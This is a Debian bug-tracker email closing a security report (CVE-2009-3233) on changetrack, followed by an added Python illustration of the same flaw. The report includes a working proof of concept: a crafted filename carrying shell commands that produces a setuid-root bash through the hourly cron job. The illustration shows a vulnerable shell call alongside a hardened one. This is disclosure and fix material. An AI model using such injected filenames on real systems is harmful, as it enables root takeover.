Your message dated Thu, 24 Sep 2009 01:57:50 +0000
with message-id <[email protected]>
and subject line Bug#546791: fixed in changetrack 4.3-3+etch1
has caused the Debian Bug report #546791,
regarding CVE-2009-3233: shell command injection via filename
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
546791: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546791
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: changetrack
Version: 4.3-3
Severity: grave
Tags: security
Justification: user security hole



-- System Information:
Debian Release: 5.0.2
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-openvz-amd64 (SMP w/3 CPU cores)
Locale: LANG=pl_PL.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages changetrack depends on:
ii  libfile-ncopy-perl            0.34-1     file copying like cp for perl
ii  perl                          5.10.0-19  Larry Wall's Practical Extraction 

Versions of packages changetrack recommends:
ii  cron                          3.0pl1-105 management of regular background p
ii  ed                            0.7-3      The classic unix line editor

changetrack suggests no packages.

-- no debconf information


It is possible to run commands as root if you have permission to create
files in a directory checked via changetrack, example:

mkdir  /etc/test
touch  "/etc/test/sth
echo commmand u like most
cd ..
cd ..
cd ..
cd ..
cd bin
cp bash  bash.ultimate
chmod  ug+s bash.ultimate
"

echo "/etc/test/*" >> /etc/changetrack.conf

wait for /etc/cron.hourly/changetrack

# ls -al /bin/bash.ultimate
-rwsr-sr-x 1 root root 797784 wrz 15 20:52 /bin/bash.ultimate


bash.ultimate -p ;)


Probably changetrack should not use shell commands, or escape sh special
characters like spaces, enters, ; etc...

-- 
  Regards
      Marek Grzybowski



--- End Message ---
--- Begin Message ---
Source: changetrack
Source-Version: 4.3-3+etch1

We believe that the bug you reported is fixed in the latest version of
changetrack, which is due to be installed in the Debian FTP archive:

changetrack_4.3-3+etch1.diff.gz
  to pool/main/c/changetrack/changetrack_4.3-3+etch1.diff.gz
changetrack_4.3-3+etch1.dsc
  to pool/main/c/changetrack/changetrack_4.3-3+etch1.dsc
changetrack_4.3-3+etch1_all.deb
  to pool/main/c/changetrack/changetrack_4.3-3+etch1_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Jens Peter Secher <[email protected]> (supplier of updated changetrack package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])



Format: 1.7
Date: Thu, 17 Sep 2009 22:32:43 +0200
Source: changetrack
Binary: changetrack
Architecture: source all
Version: 4.3-3+etch1
Distribution: oldstable-security
Urgency: medium
Maintainer: Jens Peter Secher <[email protected]>
Changed-By: Jens Peter Secher <[email protected]>
Description: 
 changetrack - configuration-file change tracker
Closes: 546791
Changes: 
 changetrack (4.3-3+etch1) oldstable-security; urgency=medium
 .
   * Fix possible local exploit by rejecting filenames with unsafe
     characters (cf. CVE-2009-3233).  Thanks to Marek Grzybowski and
     Andrzej Lemieszek.
     (Closes: #546791)
Files: 
 b519ffa08cb165819e9bdd67f7e9a4f3 710 utils optional changetrack_4.3-3+etch1.dsc
 3334d9ef744a08cc0b4d8253c78b7c10 13330 utils optional changetrack_4.3-3+etch1.diff.gz
 b1002889940ab122879f4d709fe8a573 21706 utils optional changetrack_4.3-3+etch1_all.deb




--- End Message ---
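The bug class the report above demonstrates and the changelog's fix ("rejecting filenames with unsafe characters") addresses, as an added Python example that is not changetrack's code: a tracked filename interpolated into a shell command string, next to a hardened path that refuses unsafe names and passes argv as a list so no shell parses the name. The helper names, the wrapped `wc -c` command, the allowed-character set and the crafted filename are constructed assumptions for the illustration.

```python
import re
import subprocess

# Characters allowed in a tracked filename. This mirrors the fix's approach
# of rejecting unsafe names; the exact allowed set is an assumption.
SAFE_NAME = re.compile(r"\A[A-Za-z0-9_./+,:@%=-]+\Z")

# Constructed filename in the spirit of the report: a newline followed by a
# second command (a harmless echo here instead of the report's cp/chmod).
CRAFTED = "/nonexistent/sth\necho INJECTED"

def is_safe_filename(name: str) -> bool:
    """Reject anything /bin/sh could interpret: whitespace, newlines,
    quotes, ';', '$', '`', '*', '|' and so on."""
    return bool(SAFE_NAME.match(name))

def run_vulnerable(name: str) -> str:
    """Broken pattern: the filename is pasted into a shell command string,
    which is what a Perl backtick or one-argument system() call does."""
    cmd = f"wc -c {name}"
    res = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return res.stdout

def run_hardened(name: str) -> str:
    """Fixed pattern: validate the name first, then pass argv as a list so
    no shell ever parses the filename."""
    if not is_safe_filename(name):
        raise ValueError(f"refusing unsafe filename: {name!r}")
    res = subprocess.run(["wc", "-c", name], capture_output=True, text=True)
    return res.stdout

def injection_marker_seen(name: str) -> bool:
    """True if the vulnerable path actually ran the injected echo."""
    return "INJECTED" in run_vulnerable(name).splitlines()

def hardened_rejects(name: str) -> bool:
    """True if the hardened path refuses the name before any command runs."""
    try:
        run_hardened(name)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    print("safe name?", is_safe_filename(CRAFTED))             # False
    print("vulnerable path output:", run_vulnerable(CRAFTED))  # INJECTED
    print("hardened path rejects?", hardened_rejects(CRAFTED))  # True
```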